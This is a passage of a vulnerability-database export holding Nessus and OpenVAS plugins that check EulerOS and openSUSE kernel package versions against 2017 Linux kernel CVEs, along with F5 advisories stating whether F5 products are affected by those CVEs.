/dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d973af9c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.152\",\n \"kernel-debug-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.152\",\n \"kernel-devel-3.10.0-229.49.1.152\",\n \"kernel-headers-3.10.0-229.49.1.152\",\n \"kernel-tools-3.10.0-229.49.1.152\",\n \"kernel-tools-libs-3.10.0-229.49.1.152\",\n \"perf-3.10.0-229.49.1.152\",\n \"python-perf-3.10.0-229.49.1.152\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "naslFamily": "Huawei Local Security Checks", "pluginID": "104296", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "scheme": null, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"f5": [{"lastseen": "2019-05-16T00:21:08", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned Installer-3052 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None | None \nBIG-IP GTM | None | 11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None | None \nF5 WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.2 | Not vulnerable | None | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | [2.2](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:P/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L>) | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2017-11-08T00:52:00", "published": "2017-11-08T00:52:00", "id": "F5:K33567812", "href": "https://support.f5.com/csp/article/K33567812", "title": "Kernel vulnerabilities CVE-2017-12192 and CVE-2017-15274", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:39:32", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 710148 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H44309215 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 14.x | None | Not applicable | Not vulnerable2 | None | None \n13.x | None | Not Applicable \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | None | Not applicable | Not vulnerable | None | None \nBIG-IQ Centralized Management | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | None | Not applicable | Not vulnerable | None | None \nF5 iWorkflow | 2.x | None | Not applicable | Not vulnerable | None | None \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2These products contain the affected code. However, F5 has determined the vulnerability status to be Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2018-11-19T19:06:00", "published": "2018-03-14T22:32:00", "id": "F5:K44309215", "href": "https://support.f5.com/csp/article/K44309215", "title": "Linux kernel vulnerability CVE-2017-1000111", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-15T18:35:35", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-09-28T00:57:00", "published": "2016-12-23T00:06:00", "id": "F5:K38472857", "href": "https://support.f5.com/csp/article/K38472857", "title": "Kernel vulnerability CVE-2016-8655", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:40:23", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2018-08-28T05:50:00", "published": "2018-08-28T05:50:00", "id": "F5:K32616738", "href": "https://support.f5.com/csp/article/K32616738", "title": "Linux kernel vulnerability CVE-2017-15265 ", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:40:49", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 710148 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H60250153 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 14.x | None | Not applicable | Not vulnerable2 | None | None \n13.x | None | Not applicable \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | None | Not applicable | Not vulnerable | None | None \nBIG-IQ Centralized Management | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | None | Not applicable | Not vulnerable | None | None \nF5 iWorkflow | 2.x | None | Not applicable | Not vulnerable | None | None \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2These products contain the affected code. However, F5 has determined the vulnerability status to be Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations. \n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2018-11-19T19:47:00", "published": "2018-03-15T01:22:00", "id": "F5:K60250153", "href": "https://support.f5.com/csp/article/K60250153", "title": "Linux kernel vulnerability CVE-2017-1000112", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:39:20", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\n**Note**: F5 previously evaluated CVE-2017-6346 as Vulnerable but has since re-evaluated it as Not Vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2020-02-14T21:20:00", "published": "2017-04-12T18:33:00", "id": "F5:K11023978", "href": "https://support.f5.com/csp/article/K11023978", "title": "Linux kernel vulnerability CVE-2017-6346", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-27T18:37:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171271", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171271", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1271)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1271\");\n script_version(\"2020-01-23T11:02:42+0000\");\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-12188\", \"CVE-2017-12192\", \"CVE-2017-14991\", \"CVE-2017-15265\", \"CVE-2017-15274\", \"CVE-2017-15649\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:02:42 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:02:42 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1271)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1271\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1271 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an MMU potential stack buffer overrun.(CVE-2017-12188)\n\nA vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYTCL_READ on negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.(CVE-2017-12192)\n\nsecurity/keys/keyctl.c in the Linux kernel before 4.11.5 does not consider the case of a NULL payload in conjunction with a nonzero length value, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted add_key or keyctl system call, a different vulnerability than CVE-2017-12192.(CVE-2017-15274)\n\nLinux kernel: heap out-of-bounds in AF_PACKET sockets. This new issue is analogous to previously disclosed CVE-2016-8655. In both cases, a socket option that changes socket state may race with safety checks in packet_set_ring. Previously with PACKET_VERSION. This time with PACKET_RESERVE. The solution is similar: lock the socket for the update. This issue may be exploitable, we did not investigate further. As this issue affects PF_PACKET sockets, it requires CAP_NET_RAW in the process namespace. But note that with user namespaces enabled, any process can create a namespace in which it has CAP_NET_RAW.(CVE-2017-1000111)\n\nUse-after-free vulnerability in the Linux kernel before 4.14-rc5 allows local users to have unspecified impact via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\nnet/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free, a different vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\nThe sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0.(CVE-2017-14991)\n\nAn exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges.(CVE-2017-1000112)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.49.1.152\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:28:04", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-11-02T00:00:00", "id": "OPENVAS:1361412562310851632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851632", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2846-1)", "type": "openvas", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 